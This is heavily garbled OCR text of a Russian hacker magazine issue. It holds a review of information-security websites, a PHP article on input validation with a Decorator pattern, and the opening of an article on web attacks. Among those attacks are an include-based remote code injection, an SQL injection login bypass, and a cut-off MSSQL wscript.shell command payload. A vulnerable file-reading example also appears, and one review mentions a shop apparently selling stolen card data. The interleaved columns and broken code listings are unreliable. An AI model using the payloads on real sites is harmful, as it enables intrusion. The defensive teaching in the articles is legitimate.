> Технологии четырехъядерных систем 

- Звездные железки: AMD Athlon 64 

> Линейка: материнские платы АМ2 MSI 


Й ФОРМАТ г 
6 wi ОРЫ CEPbESHDIX РАЗМЕР! 


Практика 


> Экстремальный разгон Intel Kentsfield 

„Моддинг: проект ЗМяние 

+ Учим как выжить с Windows Vista 
наноутбуке 


DVD в комплекте! 
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INFOSAFE 


притоны 
интернета 


Обзор сайтов по информационной безопасности 
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КАК НИ КРУТИ, А ИНФОРМАЦИЯ СЕЙЧАС ОПРЕДЕЛЯЕТ НА ПЛАНЕТЕ ПРАКТИЧЕСКИ ВСЕ. 

И ВЕДЬ У КОГО ЕЕ БОЛЬШЕ, У КОГО ОНА ПОЛНЕЕ И АКТУАЛЬНЕЕ — ТОТ И СИЛЬНЕЕ. ЧТОБЫ 
У ТЕБЯ НЕ ОТОБРАЛИ ТВОИ СОБСТВЕННЫЕ БАЙТЫ И НЕ ОСТАВИЛИ БЕСПОМОЩНЫМ — 
ЧИТАЙ НАШ ОБЗОР ЛУЧШИХ ПОРТАЛОВ ПО ЗАЩИТЕ ИНФОРМАЦИИ! 


Юрий Наумов aka Crazy_scrip 


script @ геа!.хакер.ги 


Как заявляют авторы 
проекта, INFOSAFE — 
первый специализиро- 
ванный «ресурс ресур- 
сов» об информацион- 
ной безопасности. Он 
представляет собой 
«удобный и полный те- 
матический интернет- 
каталог», а в совокуп- 
ности с рейтинговой 
системой — этакий 
всеобъемлющий ин- 
формационный портал. 
Ресурсы в нем сортиру- 


ются по убыванию рей- 
тинга, который напря- 
мую зависит от голосо- 
вания посетителей. 

По каждому разде- 

лу ИТ предлагается 
выбрать тип искомых 
данных: либо мы ищем 
материалы в виде ста- 
тей, а возможно — под- 
ходящий форум или 
вовсе он-лайн магазин. 
Итого: полезный, стре- 
мительно развиваю- 
щийся ресурс. 


3/5 Я думаю, многим из- 
вестен этот проект. 


Void.ru Void.ru — своего рода 
независимая пресса, 


не так давно осве- 
щавшая разнообраз- 
ные аспекты инфор- 
мационной безопас- 
ности. Все это было 
построено сугубо на 
энтузиазме участни- 
ков проекта. Сейчас 
портал обновляется 
редко, но, несмотря 
на это, популярность 
его не упала. Помимо 
статей и новостей, по- 
сетителям и сегодня 
предлагаются удоб- 
ные он-лайн сервисы: 
прокси-чекер со спис- 
ком только что прове- 
ренных адресов, ано- 
нимный мейлер, все- 
возможные дешиф- 
раторы паролей раз- 
личного ПО, база 
МАС-адресов. Заме- 
чу, что сейчас немало 
сайтов молодых секь- 
юрити-команд хостят- 


3,5/5 


Root-Access 


ww.root-access.org 


А это новичок в сегод- 
няшнем обзоре интер- 
нет-ресурсов. Сравни- 
тельно молодой проект 
в том числе и на тему 
IT-security. Форум, 

как и обычно у зеле- 
ных хацкерских проек- 
тов, вряд ли заманит 
своим содержанием 
продвинутых безопас- 
ников, но начинающим 


здесь будет в самый 
раз. Статьи имеются 
неплохие, но в основ- 
ном это старенькие 
тексты со сторонних 
порталов. Возможно, 
некоторым будет инте- 
ресен интернет-мага- 
зин с разнообразием 
уинов, пинов, пластика 
и тому подобными 
вкусностями. 


ся именно на void.ru. 
Проект еще жив! 
Пусть и не настолько 
активен, но опреде- 
ленно жив. 
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Viruslist 


www. Viruslist.com 


Глобальный ресурс 
Лаборатории Касперс- 
кого, полностью посвя- 
щенный информаци- 


онной безопасности. 
Имеющаяся на сайте 
энциклопедия вирусов 
даст максимальную 


5/5 


SecurityLab 


www.securitylab.ru 


‘ent oe 


Ha мой взгляд, самый 
известный и популяр- 
ный (около 27 тысяч 
зарегистрированных 
пользователей) инфор- 
мационный портал 
в России, рассказыва- 
ющий о событиях 
в области защиты 
информации и новых 
технологий. Positive 
Technologies (владель- 
цы портала www.ptsecu- 
rity.ru) — успешная кон- 
тора в сфере веб-безо- 
пасности, занимающая 
лидирующее место 
на российском рынке. 
Набрав этот адрес 
в своем браузере, 
ты получишь доступ 
к самым свежим 
и актуальным событи- 
ям в области IT-security. 
Спецы портала 
заботятся о том, чтобы 
посетитель получил 
самую исчерпывающую 
информацию обо всех 
найденных уязвимос- 
тях, их анализ с точки 
зрения профессиона- 
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информацию 

по различным 
вопросам: начиная 
от принципов работы 
и заканчивая мерами 
предосторожности. 
В состав включено 
полное описание 
всех известных 
вредоносных прог- 
рамм. Ha viruslist.com 
всегда можно полу- 


чить доступ к различ- 
ной статистической 
информации, ознако- 
миться с тенденциями 
развития вирусных 
технологий и спама, 
узнать последние 
новости уязвимых 
продуктов. А если 
возникнут какие-либо 
вопросы, то всегда 
можно воспользовать- 


ся форумом, 

на котором ты 
получишь исчерпыва- 
ющую информацию 
по тематике сайта. 
Сайт доступен 

на 6 языках, включая 
русский. В твоем 
распоряжении воз- 
можность быстрого 
поиска и удобный 
интерфейс. 


лов этой области, 

а также конкретные 
рекомендации по ре- 
шению проблем. В ана- 
литическом разделе 
располагаются публи- 
кации как оригиналь- 
ных, так и весьма инте- 
ресных иностранных 
статей в области П-ин- 
дустрии. 

На сайте периоди- 
чески проходят конкур- 
сы, голосования, вре- 
менами обновляется 
архив из более чем 
двух тысяч различных 
шароварных и фривар- 
ных программ. National 
Vulnerability Database 
содержит информацию 
на английском о более 
чем 20 тысячах уязви- 
мостей. 

Первый информаци- 
онный портал совмест- 
но с небезызвестным 
тебе Алексеем Лукац- 
ким (руководителем 
одного из отделов НИП 
«Информзащита») 
предлагает новый 


и довольно интерес- 
ный сервис — 
«бесийу-календарь». 
Придуман он для тех, 
кому интересна исто- 
рия защиты информа- 
ции. Календарь выво- 
дит знаменательные 
события в мире инфор- 
мационной безопас- 
ности текущего дня. 
База растет в том чис- 
ле и благодаря помо- 
щи посетителей порта- 
ла. Информер абсо- 
лютно свободный и 
доступен любому же- 
лающему разместить 
его у себя на странице. 
Нельзя не отметить 
иеще один полезный 
раздел — форум. Здесь 
круглые сутки можно 
получить квалифициро- 
ванный ответ на инте- 
ресующий вопрос от 
специалистов и сисад- 
минов со всей России. 
Форум SecurityLab — 
самое популярное мес- 
то в рунете, где можно 
узнать почти все об ин- 
формационной безо- 
пасности. Местную рас- 
сылку читают почти 20 
тысяч человек. 
Неудивительно, 
что столь популярный 
секьюрити-портал под- 
вергается постоянным 
атакам. Специалисты 
позаботились и о себе: 
интернет-проект уп- 
равляется системой 
«Битрикс» —- одной 
из наиболее стабильных 
и защищенных CMS. 
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Zone-H 


Wwww.zone-h.ru 


Все новости о происхо- 
дящих сражениях за 
информацию стекают- 
ся именно сюда — 

в международный 
центр ИТ-безопаснос- 
ти. Здесь, в разделе 
«Информационные 
войны» можно найти 
последние сводки 

из зоны боевых 
действий. На сайте 
содержится эксклюзив- 
ная информация об ата- 
ках серверов, большая 
часть которой появля- 
ется благодаря скрипт- 
киддисам и иным хули- 
ганам. Причем монито- 
ринг этих атак не прек- 
ращается ни на секун- 
ду. Во всем этом явно 
вычерчивается силуэт 
идеи проекта: не терять 
связь между события- 
ми в сфере IT-security 
ивмире. Zone-H де- 
монстрирует, что поли- 
тика и проблемы ин- 
формационной безо- 
пасности неразрывно 
переплетены между со- 
бой и с происходящим 
в глобальной Сети. 
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BugTraq.Ru 


ww.bugtraq.rul 


Одна из самых старых 
русскоязычных стра- 
ниц об обеспечении за- 
щиты главного ресурса 
на планете. Может 
быть, не такая объем- 
ная и активная (регу- 
лярность обновления 
новостей от нескольких 
раз в день до одного 
раза в неделю, по мере 
накопления), зато мо- 
жет порадовать своим 
профессионализмом 

и эксклюзивностью 
большей части инфор- 
мации. Главная зада- 
ча — изучение и отсле- 
живание тенденций, 
проведение аналити- 
ческих работ и сообще- 
ние о наиболее значи- 
мых событиях П. Ре- 
сурс рассчитан на бо- 
лее подготовленного 
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Anti-Malware 


ww.anti-malware.ru 


Независимый инфор- 
мационно-аналитичес- 
кий проект о том, как 
защитить себя от вся- 
кой malware-gpaHn. 
Над его развитием ра- 
ботают настоящие 
профессионалы, име- 
ющие большой опыт 
работы в области IT- 
security. Уровень спе- 
цов проекта становит- 
ся заметен, если пос- 
мотреть, как стреми- 
тельно развивается 
ресурс. Каждый день 
в новостной ленте 
публикуется свежая 
информация о теку- 


посетителя: основная 
аудитория — ведущие 
специалисты П, преи- 
мущественно с выс- 
шим образованием, ко- 
торые стремятся полу- 
чить «чистую» инфор- 
мацию без примесей 
абсолютно ненужных 
фактов и домыслов. 

Но главным досто- 
инством BugTraq.ru 
стала одноименная 
рассылка (на сегод- 
няшний день — 83 ты- 
сячи подписчиков), 
фактически и послу- 
жившая фундаментом 
для возведения ны- 
нешнего портала. 

С 1997 года в ящики 
подписчиков понес- 
лись килобайты ценной 
секьюрити-информа- 
ции, а механизм сей 
запустил Дмитрий Лео- 
нов — человек, извест- 
ный каждому, кто ког- 
да либо интересовался 
IT-security. Ведущий 
специалист, автор ши- 
роко известной книги 
«Атака ни Интернет», 
уважаемый в IT-Kpyrax, 
он также создатель 
громких проектов 
Russian Security 
Newsline, HackZone.Ru, 
ezhe.ru. Определенно, 
BugTraq.ru — must visit! 


щих и возможных уг- 
розах, разрабатыва- 
ются и освещаются 
наиболее эффектив- 
ные технологии защи- 
ты. Здесь всегда мож- 
но ознакомиться с по- 
годой на линии фрон- 
та: периодически про- 
водятся аналитичес- 
кие обзоры и всевоз- 
можные исследова- 
ния. Anti-Malware под- 
держивается такими 
известными компани- 
ями как Dr.Web, Диа- 
логНаука, Лаборато- 
рия Касперского, 
Panda Sofware. 
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uinc 


WWW.UINC.ru| 
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БЕЗПЕКА 


Еще один долгожитель 
рунета (май 2001), соз- 
данный отечественной 
командой итС (Under- 
ground InformatioN 
Center). Одноименный 
портал — попытка сде- 
лать ресурс, схожий 

по тематике с популяр- 
ной в то время Хакзо- 
ной, но исключаю- 
щий ее основной недо- 
чет — обилие мусора 
(флейминг и флудинг 
плотно поселился в те 
времена на популяр- 
ном форуме). 

Network & security 
news — один из инте- 
реснейших разделов! 
Подавляющее боль- 
шинство новостных 
сообщений переведе- 
но с иностранных пер- 


Фактически, этот ре- 
сурс — сайт украинской 
конторы, специализиру- 
ющейся на информаци- 
онных технологиях и ин- 
формационной безо- 
пасности. Помимо дан- 
ных о предприятии и 
списка оказываемых 
услуг, эта страница яв- 


воисточников самими 
членами группы. Све- 
жие посты в этом 
разделе появляются 
каждый день по 6-10 
штук и обязательно 

с указанием ссылки 

на оригинал. 

Статьи шпс.ги редко 
обновляются, но архив 
включает в себя по- 
лезную подборку ин- 
формации, в том числе 
и на актуальные сегод- 
ня темы. Для самых 
маленьких найдется 
РАО с популярными 
вопросами в облас- 
ти IT. Архив софта то- 
же стоит полис- 
тать (там тебя ждет 
очень хорошая под- 
борка программ по ка- 
тегориям с их описани- 
ем и ссылкой на закач- 
ку). А с командными 
релизами можно поз- 
накомиться в разделе 
проектов. Здесь живут 
такие известные оби- 
татели софтверного 
мира как RegScan, 
ИМС Keylogger, РЕ 
Optimizer и многие дру- 
гие. Форум не понра- 
вился, выполнен в сти- 
ле олд скул :). 


ляется неплохим ин- 
формативным ресур- 
сом по безопасности. 
Деятели из местного 
Центра Безопасности 
готовят качественную 
рассылку «Компьютер- 
ная безопасность». 

3—4 раза в неделю тебе 
на мыло будет прихо- 
дить оперативная ин- 
формация о последних 
багах, вирусах, новос- 
ти ПО и информацион- 
ных технологий. А так- 
же — все изменения 

в законодательстве, так 
или иначе связанные 

с защитой информации, 
копирайтами и интел- 
лектуальной собствен- 
HOCTbIO. 


26 ГЛОБАЛЬНАЯ ЭПИДЕМИЯ СПЕЦ 02-07 


Чаще всего взломщики пользуются различными не- 
доработками в скриптах — например, недостаточной 
проверкой поступающей извне (от посетителя сайта) 
информации. В данной статье я покажу, как, исполь- 
зуя современные технологии программирования, 
можно организовать гибкую и надежную систему 
проверки данных, полученных от пользователя. 

> типичные дыры. Какой код может быть уязви- 
мым к атакам взломщиков? Как взломщики поль- 
зуются дырами в скриптах? Прежде всего, отмечу, 
что грамотно написанный скрипт довольно трудно 
взломать, а большинство взломов происходит из- 
за недостаточной бдительности программистов. 
«Проверять, проверять и еще раз проверять вход- 
ные данные» — вот лозунг написания надежных и 
безопасных скриптов. 

> имена файлов. Пользователь отправляет 
свои запросы к серверу с помощью методов POST 
и СЕТ. Из заполненных форм входные данные ча- 
ще всего поступают методом РОЗТ, а для передачи 
данных с помощью гипертекстовой ссылки приме- 
няется метод СЕТ. Например, у нас на сайте разме- 
щены различные статьи, и для их показа мы исполь- 


П 
КОСТЮМ 


OTUBOYKOSIbHbIN 


Проверка входных данных Ha РНР с помощью ООП 


ПРОБЛЕМА СОЗДАНИЯ БЕЗОПАСНЫХ СКРИПТОВ ВСЕГДА СТОЯЛА ДОВОЛЬНО ОСТРО. 
ДАЖЕ ЕСЛИ МЫ СОЗДАЕМ ОБЫЧНУЮ ДОМАШНЮЮ СТРАНИЦУ, НАМ ВРЯД ЛИ БУДЕТ 
ПРИЯТНО, ЧТО КАКОЙ-НИБУДЬ УМЕЛЕЦ ЕЕ ВЗЛОМАЕТ. ЧТО УЖ ГОВОРИТЬ О КРУПНЫХ 
КОРПОРАТИВНЫХ И КОММЕРЧЕСКИХ САЙТАХ, ВЕДЬ В ДАННОМ СЛУЧАЕ ВЗЛОМ МОЖЕТ 
НАНЕСТИ ДОВОЛЬНО ЗНАЧИТЕЛЬНЫЙ ФИНАНСОВЫЙ УЩЕРБ. 


Борис Вольфсон 


зуем отображающий скрипт. Информация о статьях 
хранится в базе данных, а специальный скрипт вы- 
дает примерно такой список: 


«дырявый» СПИСОК ССЫЛОК 

<a href="show.php?filename= 
articlel.html">Cratha 1</a> 
<a href="show.php?filename= 
article2.html">Cratba 2</a> 
<a href="show.php?filename= 
article3.html">Cratha 3</a> 


Каждая ссылка указывает на скрипт show.php, ко- 
торый выводит статьи на экран (в качестве параме- 
тра ему передается имя файла). Сам скрипт 
show.php содержит следующий код: 


потенциальная дыра 
// Вывод верхней части страницы 


echo file_get_contents ($filename) ; 
// Вывод нижней части страницы 


Конечно, мы рассмотрели самый запущенный слу- 
чай: в данном коде содержатся две грубых с точки 
зрения написания безопасного кода ошибки. 
Во-первых, для получения внешних данных (имени 
файла) используется глобальная переменная $file- 
пате. Вместо этого лучше использовать ассоци- 
ативные массивы $ REQUEST, $_POST, $_СЕТ 
и другие. Тем более что в следующих версиях РНР 
глобальные переменные на основе данных пользо- 
вателя создаваться не будут, и хочешь ты этого или 
нет — придется использовать специальные масси- 
вы. Во-вторых, $filename никак не проверяется. На- 
пример, взломщик может указать вместо имени 
файла в строке ввода адреса index.php и получит 


Таблица 1 


ООП в РНР5 


> = введение. Достаточно часто для 
разработки сайтов используется язык 
РНР. В последней (пятой) версии РНР 
значительно улучшилась поддержка 
ООП (объектно-ориентированного про- 
граммирования). Тем не менее, многие 
программисты при создании сайтов ис- 
пользуют лишь самые примитивные 
возможности ООП, например, инкапсу- 
ляцию данных. Безусловно, такое при- 
менение ООП делает код более каче- 
ственным, но, применяя и другие воз- 
можности ООП, можно добиться боль- 
шего эффекта. Применение полимор- 
физма и наследования позволяет значи- 
тельно сократить код, одновременно де- 
лая его более надежным. Также такой 
код можно часто использовать повтор- 
но. Рассмотрим это дело на практике. 
Итак, перед нами стоит задача — сде- 
лать страницу Васи Пупкина. Вверху 
страницы должна быть большая над- 
пись «Домашняя страница Васи Пупки- 
на» (обычно это логотип сайта). Далее 
следует меню, состоящее из следующих 
разделов: «Главная страница», «Биогра- 
фия», «Ссылки». По середине страницы 
идет текст раздела. Внизу дублируется 
меню. Сайт будет состоять из четырех 
основных файлов (смотри таблицу 1). 

> каркас сайта. Наша страница будет 
являться классом. Определим абстрактный 
класс НТМЕ-страницы в файле html.php: 


Название Описание 


абстрактный базовый класс 


index.php — Главная страница «страница HTML» 
bio.php Страница с биографией <?php 
Васи Пупкина abstract class HTMLPage 
links.php = Страница с ссылками { 
html.php = Вспомогательный файл protected $Title ="; 
Таблица 2 


Название Описание 


function _ construct($Title) Создание и инициализация объекта 
(в нашем случае — установка названия 


страницы) 


function BeginHTML() 
function EndHTML() 
function Logo() 

function Menu() 

abstract function MainText() 
function Write() 


Вывод заголовка html-cbanna 

Вывод окончания htmi-cbaiina 

Вывод логотипа сайта 

Вывод главного меню сайта 

Вывод основного содержания веб-страницы 
Вывод веб-страницы путем вывода 

ее отдельных элементов 


дельных элементов страницы, таких как 
меню, логотип и так далее. В методе 
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ком. Особое внимание следует уделить 
абстрактному методу MainText. Этот ме- 
тод называется абстрактным, посколь- 
ку он не реализован в этом классе, 
атолько объявлен. Переопределен и ре- 
ализован он будет в дочерних классах. 
Так на странице ссылок в этом методе 
будут выводиться ссылки, а на страни- 
це биографии — текст биографии Васи 
Пупкина. Сам класс объявлен абстракт- 
ным, и, значит, создать экземпляры та- 
кого класса будет невозможно. 

В классе объявлена переменная 
$Title с областью видимости protected, 
то есть доступ к ней может получить 
либо сам класс, либо его наследники. 
Теперь осталось создать остальные 
три файла. Покажу, как это можно сде- 
лать на примере index.php: 


главная страница сайта 


В данном случае просто создается но- 
вый класс IndexPage, производный от 
класса НТМЕРаде и переопределяется 
метод MainText для вывода основного 
содержания страницы. Для наглядно- 
сти приведу схему иерархии классов 
(смотри таблицу 2). 

> — результат. Преимущества исполь- 
зования ООП будут тем больше, чем 
больше будет сайт. К тому же, по ходу ра- 
боты требования к сайту будут меняться. 
Может потребоваться добавление новой 
страницы. Для этого надо будет создать 
новый файл с классом, производным от 
HTMLPage, переопределить метод Main- 
Text и создать соответствующий пункт 
меню. Вот как можно использовать на- 
следование. Также просто будет изме- 
нить дизайн всех страниц — изменения 
будут происходить в классе HTMLPage, 
другие страницы унаследуют дизайн ав- 
томатически. Описанный подход хорошо 
подходит для небольших сайтов с нес- 
колькими десятками страниц. 
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Component 
+Operation() 
fh 
——_> Component Operation() 
ConcreteComponent Decorator Decorator::Operation(); 
+Operation() +Operations() AddedBehavior(); 
nN 
ConcreteDecoratorA ConcreteDecoratorB 
-AddedState +Operation() 
+Operation() +AddedBehavior() 


Схема1. Диаграмма классов при использовании декоратора 


текст скрипта, а такой ценной информацией он без 
труда воспользуется для дальнейшего поиска недо- 
четов в нашей системе безопасности. Следующим 
шагом взломщика может быть попытка вывести на 
экран какие-либо конфигурационные файлы с ло- 
гином и паролем администратора сайта. 

Выхода два: можно вместо имени файла пе- 
редавать идентификатор статьи, а затем преобра- 
зовывать его в имя файла или тщательно прове- 
рять имя файла на допустимые имена, на слеши 
и обратные слеши, чтобы взломщик не смог путе- 
шествовать по нашим каталогам. Во втором случае 
лучше всего воспользоваться оператором if (или 
массивом имен файлов) и выбирать файл для ото- 
бражения из жестко заданного списка. 
> — функция system(). Встречаются и более пато- 
логические случаи: некоторые «программисты» ис- 
пользуют внешние данные в функции system(), ко- 
торая выполняет произвольную команду операци- 
онной системы. В таком случае до дефейса сай- 
та — буквально один шаг. Функцию system вообще 
не следует использовать без экстренной необходи- 
мости! Если уж пришлось задействовать ее вместе 
с внешними данными, то тут надо будет осуще- 
ствить очень строгую проверку на спецсимволы: 
от всех специальных символов *тх-систем до сим- 
вола с кодом 0, иначе взломщик получит возмож- 
ность исполнять произвольные команды операци- 
онной системы на сервере, и от сайта останутся од- 
ни потроха. 
> базы данных. В связке с PHP обычно приме- 
няют базу данных MySQL (реже — PostgreSQL). До- 
ступ к данным в таком случае осуществляется при 
помощи языка запросов SQL. В такие запросы ча- 
сто приходится вставлять внешние данные, напри- 
мер, для гостевой книги в базе данных надо сохра- 
нить, как минимум, ник и сообщение пользователя. 
Язык SQL очень гибок, и поэтому здесь надо быть 
внимательным к входящим данным. 
> = чаты, гостевые книги, форумы. В данном слу- 
чае нужно волноваться также и о взломе другого ти- 
па: взломщик может попытаться воспользоваться 
тэгами HTML, поэтому вообще нельзя допускать 
ввода символов «<» И «>». Их надо либо экраниро- 
вать, либо выводить сообщение о неправильном 
вводе. Несоблюдение этого простого правила от- 
крывает широкую дорогу злому хакеру. 


> решение проблемы. Вспомним, что РНР5 сам 
по себе довольно неплохо поддерживает объектно- 
ориентированное программирование. Это — более 
мощный и гибкий подход, чем самостоятельное 
написание проверок, на который мы и обратим свое 
внимание. 

Итак, пусть мы решили, что в первую очередь 
будем проверять размер строки. Можно написать 
соответствующий класс. Далее нам приходит в го- 
лову, что неплохо бы сделать проверку на отсут- 
ствие слешей и обратных слешей. Мысль опытно- 
го программиста на этом не остановится, — он при- 
думает другие проверки. Как же нам их все учиты- 
вать? Нам ведь будет нужно применять эти провер- 
ки в произвольном порядке. 

Для начала — определимся предельно четко 
с тем, чего нам нужно достичь. 

В первую очередь, нам нужно динамически до- 
бавлять новое поведение объекту, то есть различно- 


д «для решения пр 


<?php 
abstract class Checker 
{ 


// класс проверки 


abstract public function Check (SStringToCheck) ; 


// перевод «успешности» проверки в строку 
// SISOK 
// SISOK 
function 
if 

Lf 


== True - проверка пройдена, 


False - проверка не пройдена 
Result (SIsOK) 


($IsOK) 


го рода проверки. Можно, конечно, придумать реше- 
ние самому, но у программистов есть поговорка: 
«Не надо изобретать велосипед». Лучше воспользо- 
ваться уже готовым решением — шаблоном проек- 
тирования, который используют профессиональные 
программисты с огромным опытом. В книге «Банда 
четырех» (Gang of Four, GoF) есть подходящий нам 
шаблон проектирования — Decorator. «Decorator» пе- 
реводится как «украшатель», то есть мы украшаем 
нашу проверку длины строки дополнительными про- 
верками. Приведу схему, по которой мы будем даль- 
ше действовать (смотри схему 1). 

Component (Checker) — это просто абстрактный 
класс проверки, ConcreteComponent (StringChecker) — 
это класс для проверки длины строки, который мы бу- 
дем декорировать дополнительным поведением. De- 
corator (Decorator) — это абстрактный класс, который 
нужен для организации цепочки декораторов. Сопсге- 
teDecorator (SlashChecker, BackSlashChecker) — это 
классы с дополнительным поведением (в нашем слу- 
чае это проверки). Теперь приведу код (см. листинг 1) 

Этот код должен выдавать такой результат: 


(1) 


// проверка строки $StringToCheck 


return "<font со1ог='дгееп' >Проверка mpovneHa</font><br>"; 


else 


return "<font со1ог=' геЯ' >Проверка не пройдена</ЁЕопе><5г>"; 


} 
} 
class StringChecker extends Checker 
{ 
function Check ($StringToCheck) 
{ 
echo "Проверка размера строки: "; 
echo $this->Result (strlen ($5Ех10аТоСВеск) 
} 


// проверка размера для строк 


<= 100); 


abstract class Decorator extends Checker 
{ 
private $MyChecker = null; 


// декоратор для класса StringChecker 


// переменная для построения цепочки декораторов 


// конструктор запоминает следующий декоратор 
function __construct (Checker $MyChecker) 
{ 

Sthis->MyChecker = $MyChecker; 

} 

public function Check ($StringToCheck) 

{ 

if ($this->MyChecker != null) 
Sthis->MyChecker->Check ($StringToCheck) ; 
} 

} 
class SlashChecker extends Decorator 

{ 

public function Check ($StringToCheck) 
{ 

echo "Проверка строки Ha слеши: "; 
echo $this->Result (!strstr($StringToCheck, 
parent: :Check ($StringToCheck) ; 

} 

} 
class BackSlashChecker extends Decorator // проверки строки на обратные слэши 
{ 

public function Check ($StringToCheck) 

{ 

echo "Проверка строки на обратные слеши: "; 
echo $this->Result (!strstr($StringToCheck, 
parent: :Check ($StringToCheck) ; 

} 

} 

// проверка строки на символы, отличные от цифр, т.е.строка должна содержать одни цифры 
class DigitsChecker extends Decorator 

{ 

public function Check ($StringToCheck) 

{ 

echo "Проверка строки на символы, отличные OT цифр: "; 

SISOK = True; 
for (Si = 0; 
{ 

if { 
t 
SISOK = False; 

} 

} 

echo $this->Result ($Т50К); 

parent: :Check ($StringToCheck) ; 

} 

} 

$51 = "Строка /для/ проверки"; 
'$S1'</b><br>"; 

$Checkerl = new BackSlashChecker (new SlashChecker (new StringChecker())); 
SCheckerl->Check($S1) ; 
echo "<br>"; 

$S2 = "1365m434\\"; 
echo "<b>IIpopepka строки: '$S2'</b><br>"; 

SChecker2 = new DigitsChecker (new BackSlashChecker (new StringChecker())); 
SChecker2->Check($S2) ; 


oS 


// вызывается функция проверки SMyChecker 


// проверки строки на слеши 


Е 


"АА 


Si < strlen($StringToCheck); $i++) 


($StringToCheck{Si} < '0') || ($StringToCheck{$i} > '9') ) 


echo "<b>IIpoBpepka строки: 


Класс Checker представляет собой абстрактный 
класс, то есть в нем объявлены специальные функ- 
ции для проверки, но использовать мы их не смо- 
жем, так как они не реализованы. Например, объя- 
влена функция Check для проверки строки. В клас- 
се StringChecker функция Check уже реализована 
для проверки размера строки, а абстрактном клас- 
ce Decorator добавлена переменная MyChecker для 
организации цепочки декораторов. 

Функция __construct(Checker $MyChecker) — 
это конструктор, который вызывается при созда- 
нии объекта класса. Конструктору передается 
объект Checker, который будет сохранен для вызо- 
ва функции Check. Функция Check класса Decora- 
tor просто вызывает $MyChecker—Check($String- 
ToCheck). В классах для конкретных проверок нуж- 
но переписать функцию Check и не забыть в конце 
ее вызвать parent::Check($StringToCheck) (Check 
класса Decorator). Посмотрим, как эта система pa- 
ботает. Необходимо создать объект, который будет 
выполнять проверку (допустим, нам надо прове- 
рить размер строки, то, состоит ли эта строка из од- 
них цифр и есть ли в ней слеши): 


теперь просто вызовем метод Check: 


Проследим цепочку вызовов. Объект $Checker яв- 
ляется объектом класса DigitsChecker, поэтому 
сначала будет произведена проверка на наличие 
символов, отличных от цифр. Но в конце этого ме- 
тода стоит строка, которая вызывает родитель- 
ский метод Check. Метод Check класса Decorator 
вызовет BackSlashChecker::Check, а он, в свою 
очередь, вызовет StringChecker::Check, на чем 
проверка и закончится. 

> делаем выводы. Безусловно, можно было бы 
попытаться реализовать то же самое при помощи 
функций, но решение получилось бы не настоль- 
ко гибким. А вот с помощью классов можно соз- 
дать целую иерархию «проверяльщиков», комби- 
нируя их в произвольной последовательности. 
Применение шаблона проектирования Decorator 
позволило создать достаточно гибкую и надеж- 
ную систему проверки. Для создания нового типа 
проверки достаточно просто создать новый класс 
от класса Decorator и переопределить метод 
Check. Если необходимо, чтобы последователь- 
ность проверок была обратной, то есть первой вы- 
полнялась StringChecker::Check, надо просто по- 
местить вызов метода Decorator::Check($String- 
ToCheck) в начале. © 
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внутримышечно 
й внутривенно 


> code injection. «Этот вид уязвимостей, слава 
Богу, потихоньку отмирает и фактически встреча- 
ется только на самописных сайтах», — такие мысли 
бродили у меня в голове перед написанием статьи. 
«Во-первых, чтобы такую дыру сделать, нужно на- 
писать реально кривой код. Во-вторых, это один из 
самых старых и хорошо описанных видов уязвимо- 
стей...», в общем, кратко коснемся темы инъекции 
кода, и тут же перейдем к нормальным уязвимо- 


Скрипт 
взломщика 
Плохая обработка 
ки у входных данных 
Скрипт, 
выполняемый 


на сервере 


Схема инъекции кода 


Обзор технологий взлома веб-ресурсов 


ПРАКТИЧЕСКИ ЛЮБОЙ САЙТ МОЖНО «УБИТЬ» ПРИ ПОМОЩИ СМЕРТЕЛЬНЫХ ИНЪЕКЦИЙ. 

ТАКОЙ УКОЛ МОЖНО СДЕЛАТЬ ТРЕМЯ СПОСОБАМИ: ИНЪЕКЦИЕЙ КОДА, ИНЪЕКЦИЕЙ SQL 
И МЕЖСАЙТОВЫМИ СКРИПТАМИ. ПРО ВСЕ ТРИ ВИДА ПИСАЛОСЬ ОЧЕНЬ МНОГО СТАТЕЙ, 

В ЭТОМ ЖЕ МАТЕРИАЛЕ Я ХОЧУ НЕ ПРОСТО РАССКАЗАТЬ, НО И ПРОАНАЛИЗИРОВАТЬ 


ВСЕ ВИДЫ ИНЪЕКЦИЙ 


стям». Именно так я и рассуждал, поэтому за теку- 
щими новостями по теме сходил в Google чисто 
для проформы. Каково же было мое удивление, 
когда по запросу «code injection» я нашел информа- 
цию о дырках в довольно известных системах веде- 
ния блогов и управления контентом. 

В теории все выглядит просто: есть скрипт, 
исполняемый на сервере, в который взломщику 
необходимо встроить свой код. Провернуть такую 
махинацию довольно просто, если соблюдены 
два условия. Во-первых, веб-разработчик должен 
использовать конструкцию include с параметром 
переменной, а во-вторых, должен плохо прове- 
рять данные, поступающие от пользователя. На- 


иболее часто такая ситуация возникает в простых 
скриптах: 


HTML + РНР 

lS Зе ==> 
<?php 
include (Spage) ; 


Bee 


<!—- Завершающая часть --> 


Соответственно, работа идет со ссылками типа 
http://tralivali/index.php?page=about.php. Самое безобид- 
ное, что можно сделать — это просмотреть инфор- 
мацию о РНР (и не только): 


РНР 
<?php 
phpinfo(); 
> 


Создав такой файлу себя на сервере, просто вклю- 
чаем его в запрос вместо about.php — и видим всю 
информацию на экране. Таким образом, мы вне- 
дрили произвольный код в скрипт на сервере и по- 
лучили необходимую информацию. Но это только 
цветочки, ведь можно при помощи РНР сделать 
все, что нашей душе угодно. 

Написав вышеописанный пример, я задумал- 
ся о его наигранности и зашел в Гугл. Каково же 
было мое удивление, что по соответствующему за- 
просу 3 сайта из первой десятки были уязвимы. 
Воистину — день открытий 5). 
> SQL Injection. Приступим ко второму блюду — 
вместо борща у нас инъекция SQL. Давным-давно, 
когда по земле еще ходили динозавры, веб-про- 
граммеры использовали для хранения данных тек- 
стовые файлы. Потом, когда человек изобрел коле- 
со, веб-разработчики придумали базы данных 
и стали хранить все в них. И было всем счастье — 


SQL-Kon 
взломщика 
Плохая фильтрация 
$ 
Vv; ввода Ha SQL-onepatopp! 
Запрос 


к базе данных 


Схема $О01-инъекции 


и список пользователей туда засунуть можно, и все 
документы на сайте положить. Но однажды один 
умелец случайно ввел в форму апостроф, и выдал 
скрипт $ОЁ-ошибку. Прочитал умелец сообщение, 
подумал немного и ввел вместо апострофа ' ОВ 
'1'='1’, еще немного поколдовал и стал стех пор ад- 
министратором. На том и сайту конец, а кто по- 
Han — молодец. А кто не понял — для тех поясню ;). 

Работа с базой ведется на языке SQL, напри- 
мер, чтобы проверить, что пользователь существу- 
ет, можно сделать такой запрос по логину: 


(1) 
=ction In 
Запускаем блокнот 
declare @o int 
exec sp_oacreate 'wscript.shell', @o out 
